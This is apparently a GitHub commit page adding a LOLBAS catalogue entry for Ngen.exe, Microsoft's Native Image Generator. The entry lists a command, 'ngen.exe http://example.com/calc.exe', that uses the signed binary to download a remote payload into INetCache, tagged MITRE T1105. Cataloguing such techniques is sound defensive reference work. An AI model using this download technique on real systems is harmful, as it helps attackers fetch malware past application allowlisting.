Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
github-actions[bot] committed Jul 15, 2024
1 parent 80c707e commit d0d7a4a
Showing 1 changed file with 24 additions and 0 deletions.
24 changes: 24 additions & 0 deletions _lolbas/Binaries/Ngen.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
---
Name: Ngen.exe
Description: Microsoft Native Image Generator.
Author: Avihay Eldad
Created: 2024-02-19
Commands:
- Command: ngen.exe http://example.com/calc.exe
Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.xxx\ngen.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.xxx\ngen.exe
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
---

0 comments on commit d0d7a4a

Please sign in to comment.